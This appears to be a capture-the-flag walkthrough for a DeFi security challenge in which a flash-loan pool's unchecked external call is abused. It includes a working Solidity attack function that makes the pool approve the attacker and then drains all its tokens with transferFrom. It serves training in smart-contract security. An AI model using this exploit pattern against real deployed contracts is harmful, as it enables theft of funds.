Understand the answer

Narrow down

Understand the arguments

Question

In this case, a new pool has launched offering free flash loans of DVT tokens.

Currently the pool has 1 million DVT tokens in balance. And you have nothing.

But don't worry, you might be able to steal them all from the pool.


(bool success, ) = target.call(data);
require(success, "External call failed");

  1. Have the pool approve the attacker's address for all of its tokens.
  2. Then withdraw all the tokens to the attacker.
function attack(IERC20 token, ITrusterLenderPool pool, address attackerEOA)
    public
{
    uint256 poolBalance = token.balanceOf(address(pool));
    // IERC20::approve(address spender, uint256 amount)
    // flashloan executes "target.call(data);", approve our contract to withdraw all liquidity
    bytes memory approvePayload = abi.encodeWithSignature("approve(address,uint256)", address(this), poolBalance);
    pool.flashLoan(0, attackerEOA, address(token), approvePayload);

    // once approved, use transferFrom to withdraw all pool liquidity
    token.transferFrom(address(pool), attackerEOA, poolBalance);
}